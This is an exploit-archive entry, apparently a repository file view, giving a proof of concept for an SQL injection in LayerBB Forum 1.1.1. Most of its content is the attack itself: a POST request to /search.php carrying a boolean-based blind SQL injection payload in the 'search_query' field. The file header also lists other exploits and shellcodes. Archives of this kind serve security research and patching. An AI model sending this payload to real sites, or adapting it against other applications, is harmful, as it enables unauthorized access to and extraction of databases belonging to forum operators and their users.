89530e070b
5 changes to exploits/shellcodes virtualenv 16.0.0 - Sandbox Escape NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) LayerBB Forum 1.1.1 - 'search_query' SQL Injection Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)
17 lines
No EOL
479 B
Text
17 lines
No EOL
479 B
Text
# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection
|
|
# Exploit Author: Ihsan Sencan
|
|
# Dork: N/A
|
|
# Date: 2018-10-04
|
|
# Vendor Homepage: https://layerbb.com/
|
|
# Software Link: https://demo.layerbb.com/
|
|
# Version: 1.1.1
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# 1)
|
|
# POST /search.php HTTP/1.1
|
|
# Host: Target
|
|
|
|
search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search |